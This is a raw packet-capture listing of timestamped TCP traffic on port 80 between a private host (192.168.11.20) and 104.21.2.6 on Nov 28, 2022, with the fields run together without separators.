                                                                    Nov 28, 2022 16:37:04.064588070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064599037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064615965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064626932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064637899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064649105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064660072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064670086 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064675093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064687014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064697027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064707994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064718962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064733982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064743996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064754963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064765930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064776897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064788103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064819098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064831018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064841032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064851046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064891100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064891100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064891100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064938068 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065104008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065201044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065275908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065327883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065340996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065351009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065361977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065385103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065445900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065458059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065469027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065500021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065512896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065524101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065535069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065545082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065551043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065551043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065563917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065574884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065586090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065597057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065620899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065632105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065643072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065654993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065665960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065676928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065701962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065712929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065720081 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065727949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065738916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065749884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.065892935 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065892935 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.065892935 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066095114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066175938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066251040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066276073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066279888 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066294909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066306114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066318035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066329002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066339016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066349983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066385031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066425085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066437006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066447020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066450119 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066463947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066474915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066485882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066495895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066507101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066518068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066528082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066553116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066565037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066622019 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066622019 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066714048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066725969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066737890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066749096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066760063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066771984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066782951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.066790104 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066960096 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066960096 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.066960096 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.067251921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067264080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067289114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067300081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067312002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067322969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067332983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067343950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067354918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067610025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067624092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067636013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067640066 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.067640066 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.067656040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067667007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067678928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067688942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067699909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067711115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067722082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067733049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067743063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067754030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067764997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067775965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067786932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067796946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067809105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067811966 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.067811966 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.067826986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067837954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.067848921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068011045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.068150043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.068161964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068325996 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.068434000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068445921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068455935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068466902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068478107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068490028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068501949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068511963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068541050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068552971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068563938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068574905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068599939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068612099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068622112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068633080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068643093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068654060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068659067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.068670034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068681002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068691969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.068831921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.068999052 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.076297045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076513052 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.076560020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076589108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076613903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076623917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076634884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076646090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076658964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076669931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076680899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076690912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076702118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076713085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076724052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076735020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076745033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076756001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076766968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076776981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076787949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076798916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076809883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076819897 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.076819897 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.076829910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076841116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076852083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076860905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.076867104 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.077028036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077038050 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.077083111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077095985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077107906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077119112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077130079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077142000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077152967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077164888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077176094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077188015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077198982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077207088 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.077207088 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.077218056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077229977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077241898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077253103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077265024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077275991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077286959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077296972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.077406883 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.077507973 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.091624022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091861963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.091893911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091907978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091917992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091931105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091942072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091953039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091964006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091974020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091984987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.091995955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092005968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092016935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092027903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092039108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092050076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092061043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092072010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092082024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092092991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092106104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092116117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092127085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092138052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092149019 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092154980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092164993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092308998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092318058 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092344046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092355013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092365980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092376947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092386961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092397928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092408895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092418909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092430115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092441082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092451096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092462063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092472076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092483044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092487097 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092498064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092509031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092519045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092530012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092560053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092585087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092608929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092619896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092631102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092641115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092650890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092659950 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092660904 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092859983 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.092917919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092931986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092942953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092953920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092963934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092974901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092986107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.092997074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093008041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093079090 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.093194008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093224049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093230963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.093241930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093252897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093264103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093275070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093285084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093296051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093307018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093317986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093328953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093339920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093349934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093362093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093373060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093383074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093394041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093400002 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.093410015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093420982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093431950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093441963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.093601942 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.093741894 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.097560883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097767115 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.097832918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097846985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097871065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097884893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097896099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097907066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097935915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097946882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097959042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097982883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.097994089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098005056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098015070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098026037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098037004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098047972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098052025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.098052025 CET4983080192.168.11.20104.21.2.6
